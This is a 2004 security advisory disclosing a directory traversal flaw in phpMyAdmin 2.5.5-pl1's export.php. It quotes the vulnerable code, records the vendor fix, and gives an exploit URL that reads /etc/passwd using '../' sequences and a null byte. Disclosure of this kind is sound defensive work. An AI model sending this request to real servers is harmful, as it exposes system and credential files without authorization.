netVigilance Security Advisory 4

Arbitrary File Disclosure Vulnerability in phpMyAdmin 2.5.5-pl1 and prior

Description:
Directory traversal vulnerability in export.php in phpMyAdmin 2.5.5 and earlier allows remote attackers to read arbitrary files via .. (dot dot) sequences in the what parameter.

External References:
Mitre CVE: CAN-2004-0129
BUGTRAQ: 20040203Arbitrary File Disclosure Vulnerability in phpMyAdmin 2.5.5-pl1 and prior
BUGTRAQ ID (bid): 9564

Summary:
phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the WWW. There is a vulnerability in the current stable version of phpMyAdmin that allows an attacker to retrieve arbitrary files from the webserver with privileges of the webserver.

Release Date:
February 03 2004

Severity:
High

SecureScout Testcase ID:
TC 17869 (released Feb 6th)

Vulnerable Systems:
phpMyAdmin 2.5.5-pl1 and prior

Vulnerability Type:
Directory Traversal - Allowing the Attacker to read any file on the Target Server via the .. (dot dot) Sequence.

Vendor Status:
The Vendor has been notified and has Released a Version 2.5.6-rc1 that fixes the problem

Example:
Arbitrary File Disclosure

File impacted : export.php

14:// What type of export are we doing?
15:if ($what == 'excel') {
16: $type = 'csv';
17:} else {
18: $type = $what;
19:}
20:
21:/**
22: * Defines the url to return to in case of error in a sql statement
23: */
24:require('./libraries/export/' . $type . '.php');

Exploit example:

- -- HTTP Request --

http://[target]/[phpMyAdmin_directory]/export.php?what=../../../../../../etc/passwd%00

- -- HTTP Request --

The vulnerability is available even if PHP register_globals is set to off.

Credits:
Cedric Cochin - netVigilance Vulnerability Research team

back to Security Advisories